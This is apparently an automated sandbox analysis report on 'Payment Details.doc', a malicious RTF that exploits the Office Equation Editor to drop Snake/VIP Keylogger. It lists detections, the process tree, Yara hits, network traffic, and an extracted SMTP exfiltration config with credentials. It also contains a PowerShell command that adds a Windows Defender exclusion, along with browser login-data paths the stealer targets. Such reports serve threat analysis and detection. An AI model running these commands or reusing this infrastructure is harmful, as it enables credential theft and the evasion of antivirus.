Windows Analysis Report
Payment Details.doc

Overview

General Information

Sample name: Payment Details.doc
Analysis ID: 1519253
MD5: cab2151d548586a1b3321aba7bde603d
SHA1: 6ada134af583ecda2a082aeb17a3a258a0cd548f
SHA256: 9e487bc68596a0c3c19aa9fed8040f452b4cbeca97451952994da511d4db2773
Tags: doc, user-abuse_ch
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Initial sample is an obfuscated RTF file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Suricata IDS alerts for network traffic
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
Adds a directory exclusion to Windows Defender
Contains functionality to capture screen (.Net source)
Contains functionality to log keystrokes (.Net Source)
Document exploit detected (process start blacklist hit)
Injects a PE file into a foreign processes
Installs new ROOT certificates
Machine Learning detection for dropped file
Office equation editor drops PE file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Equation Editor Network Connection
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
Sigma detected: Suspicious Microsoft Office Child Process
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w7x64
  • WINWORD.EXE (PID: 3192 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • EQNEDT32.EXE (PID: 3272 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • ncfplgpeter20306.exe (PID: 3444 cmdline: "C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe" MD5: 42F2CE52A57E0D72EAC297A532354E42)
        • powershell.exe (PID: 3488 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
        • ncfplgpeter20306.exe (PID: 3504 cmdline: "C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe" MD5: 42F2CE52A57E0D72EAC297A532354E42)
        • ncfplgpeter20306.exe (PID: 3520 cmdline: "C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe" MD5: 42F2CE52A57E0D72EAC297A532354E42)
    • EQNEDT32.EXE (PID: 3792 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
  • cleanup
Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Email ID": "peterlog@gtpv.online", "Password": "7213575aceACE@@  ", "Host": "hosting2.ro.hostsailor.com", "Port": "587", "Version": "4.4"}
{"Exfil Mode": "SMTP", "Username": "peterlog@gtpv.online", "Password": "7213575aceACE@@  ", "Host": "hosting2.ro.hostsailor.com", "Port": "587", "Version": "4.4"}
Source | Rule | Description | Author | Strings
Payment Details.doc | INDICATOR_RTF_MalVer_Objects | Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. | ditekSHen
  • 0xb5cf:$obj2: \objdata
  • 0xb5eb:$obj3: \objupdate
Source | Rule | Description | Author | Strings
00000009.00000002.906972286.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000009.00000002.906972286.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security
00000009.00000002.906972286.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
00000009.00000002.906972286.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
  • 0x2daa0:$a1: get_encryptedPassword
  • 0x2e028:$a2: get_encryptedUsername
  • 0x2d713:$a3: get_timePasswordChanged
  • 0x2d82a:$a4: get_passwordField
  • 0x2dab6:$a5: set_encryptedPassword
  • 0x307d2:$a6: get_passwords
  • 0x30b66:$a7: get_logins
  • 0x307be:$a8: GetOutlookPasswords
  • 0x30177:$a9: StartKeylogger
  • 0x30abf:$a10: KeyLoggerEventArgs
  • 0x30217:$a11: KeyLoggerEventArgsEventHandler
00000005.00000002.395781634.00000000032DE000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
Source | Rule | Description | Author | Strings
5.2.ncfplgpeter20306.exe.3362a30.6.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
5.2.ncfplgpeter20306.exe.3362a30.6.unpack | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security
5.2.ncfplgpeter20306.exe.3362a30.6.unpack | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
5.2.ncfplgpeter20306.exe.3362a30.6.unpack | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
  • 0x2bea0:$a1: get_encryptedPassword
  • 0x2c428:$a2: get_encryptedUsername
  • 0x2bb13:$a3: get_timePasswordChanged
  • 0x2bc2a:$a4: get_passwordField
  • 0x2beb6:$a5: set_encryptedPassword
  • 0x2ebd2:$a6: get_passwords
  • 0x2ef66:$a7: get_logins
  • 0x2ebbe:$a8: GetOutlookPasswords
  • 0x2e577:$a9: StartKeylogger
  • 0x2eebf:$a10: KeyLoggerEventArgs
  • 0x2e617:$a11: KeyLoggerEventArgsEventHandler
5.2.ncfplgpeter20306.exe.3362a30.6.unpack | MAL_Envrial_Jan18_1 | Detects Encrial credential stealer malware | Florian Roth
  • 0x394c6:$a2: \Comodo\Dragon\User Data\Default\Login Data
  • 0x38b69:$a3: \Google\Chrome\User Data\Default\Login Data
  • 0x38dc6:$a4: \Orbitum\User Data\Default\Login Data
  • 0x397a5:$a5: \Kometa\User Data\Default\Login Data

                Exploits

                Source: Network Connection; Author: Joe Security; Data: DestinationIp: 66.63.187.123, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3272, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49163
                Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3272, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\HgCppsoKmxQq[1].exe

                System Summary

                Source: Network Connection; Author: Max Altgelt (Nextron Systems); Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49163, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3272, Protocol: tcp, SourceIp: 66.63.187.123, SourceIsIpv6: false, SourcePort: 80
                Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe", ParentImage: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe, ParentProcessId: 3444, ParentProcessName: ncfplgpeter20306.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe", ProcessId: 3488, ProcessName: powershell.exe
                Source: Process started; Author: Jason Lynch; Data: Command: "C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe", CommandLine: "C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe, NewProcessName: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe, OriginalFileName: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3272, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe", ProcessId: 3444, ProcessName: ncfplgpeter20306.exe
                Source: Process started; Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io; Data: Command: "C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe", CommandLine: "C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe, NewProcessName: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe, OriginalFileName: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3272, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe", ProcessId: 3444, ProcessName: ncfplgpeter20306.exe
                Source: DNS query; Author: Brandon George (blog post), Thomas Patzke; Data: Image: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe, QueryName: checkip.dyndns.org
                Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3272, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
                Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe", ParentImage: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe, ParentProcessId: 3444, ParentProcessName: ncfplgpeter20306.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe", ProcessId: 3488, ProcessName: powershell.exe
                Source: File created; Author: Nasreddine Bencherchali (Nextron Systems); Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3192, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                Source: File created; Author: frack113; Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3488, TargetFilename: C:\Users\user\AppData\Local\Temp\npvyho4d.dxj.ps1
                Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                2024-09-26T09:25:01.423749+0200 | 2022050 | 1 | A Network Trojan was detected | 66.63.187.123 | 80 | 192.168.2.22 | 49163 | TCP
                2024-09-26T09:25:01.577030+0200 | 2022051 | 1 | A Network Trojan was detected | 66.63.187.123 | 80 | 192.168.2.22 | 49163 | TCP
                2024-09-26T09:25:12.311060+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.22 | 49166 | 188.114.97.3 | 443 | TCP
                2024-09-26T09:25:29.958052+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.22 | 49173 | 188.114.97.3 | 443 | TCP
                2024-09-26T09:25:10.807351+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.22 | 49164 | 132.226.247.73 | 80 | TCP
                2024-09-26T09:25:11.914961+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.22 | 49164 | 132.226.247.73 | 80 | TCP
                2024-09-26T09:25:17.999080+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.22 | 49167 | 193.122.130.0 | 80 | TCP

                AV Detection

                Source: Payment Details.doc; Avira: detected
                Source: http://aborters.duckdns.org:8081; URL Reputation: Label: malware
                Source: http://anotherarmy.dns.army:8081; URL Reputation: Label: malware
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\HgCppsoKmxQq[1].exe; Avira: detection malicious, Label: HEUR/AGEN.1308792
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe; Avira: detection malicious, Label: HEUR/AGEN.1308792
                Source: 00000005.00000002.395781634.0000000003139000.00000004.00000800.00020000.00000000.sdmp; Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "peterlog@gtpv.online", "Password": "7213575aceACE@@ ", "Host": "hosting2.ro.hostsailor.com", "Port": "587", "Version": "4.4"}
                Source: 5.2.ncfplgpeter20306.exe.31c8d18.8.raw.unpack; Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "peterlog@gtpv.online", "Password": "7213575aceACE@@ ", "Host": "hosting2.ro.hostsailor.com", "Port": "587", "Version": "4.4"}
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\HgCppsoKmxQq[1].exe; ReversingLabs: Detection: 28%
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe; ReversingLabs: Detection: 28%
                Source: Payment Details.doc; ReversingLabs: Detection: 44%
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\HgCppsoKmxQq[1].exe; Joe Sandbox ML: detected
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe; Joe Sandbox ML: detected

                Location Tracking

                Source: unknown; DNS query: name: reallyfreegeoip.org

                Exploits

                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Network connect: IP: 66.63.187.123 Port: 80
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Process created: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                Source: unknown; HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49165 version: TLS 1.0
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                Source: unknown; HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49178 version: TLS 1.2

                Software Vulnerabilities

                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 008D4479h9_2_008D41D0
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 008D6B91h9_2_008D68E8
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 008D5E89h9_2_008D5BE0
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 008DE7B1h9_2_008DE4E0
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 008D85A1h9_2_008D82F8
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 008D7899h9_2_008D75F0
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 008D92A9h9_2_008D9000
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 008DB5C1h9_2_008DB318
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 008DF0E1h9_2_008DEE10
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 008DCFD1h9_2_008DCD28
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 008D48D1h9_2_008D4628
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 008DC2C9h9_2_008DC020
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 008D3BC9h9_2_008D3920
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 008D62E1h9_2_008D6038
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 008D55D9h9_2_008D5330
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 008DDCD9h9_2_008DDA30
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 008D7CF1h9_2_008D7A48
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 008DFA11h9_2_008DF740
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 008D6FE9h9_2_008D6D40
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 008D9701h9_2_008D9458
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 008D89F9h9_2_008D8750
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 008DAD11h9_2_008DAA68
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 008D4021h9_2_008D3D78
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 008DC721h9_2_008DC478
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 008DEC49h9_2_008DE978
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 008DBA19h9_2_008DB770
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 008D3319h9_2_008D3070
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]9_2_00942AF9
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]9_2_00942B00
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]9_2_00945F38
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]9_2_00945F28
                Source: global traffic DNS query: name: checkip.dyndns.org
                Source: global traffic DNS query: name: reallyfreegeoip.org
                Source: global traffic DNS query: name: api.telegram.org
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49177 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49178 -> 149.154.167.220:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 132.226.247.73:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 132.226.247.73:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 132.226.247.73:80
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 193.122.130.0:80
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 158.101.44.242:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 193.122.6.168:80
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.122.130.0:80
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 132.226.8.169:80
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 132.226.8.169:80
                Source: global trafficTCP traffic: 192.168.2.22:49176 -> 193.122.6.168:80
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49177 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49177 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49177 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49177 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49177 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49177 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49178 -> 149.154.167.220:443
                Source: global trafficTCP traffic: 192.168.2.22:49178 -> 149.154.167.220:443
                Source: global trafficTCP traffic: 192.168.2.22:49178 -> 149.154.167.220:443
                Source: global trafficTCP traffic: 192.168.2.22:49178 -> 149.154.167.220:443
                Source: global trafficTCP traffic: 192.168.2.22:49178 -> 149.154.167.220:443
                Source: global trafficTCP traffic: 192.168.2.22:49178 -> 149.154.167.220:443
                Source: global trafficTCP traffic: 192.168.2.22:49178 -> 149.154.167.220:443
                Source: global trafficTCP traffic: 192.168.2.22:49178 -> 149.154.167.220:443
                Source: global trafficTCP traffic: 192.168.2.22:49178 -> 149.154.167.220:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
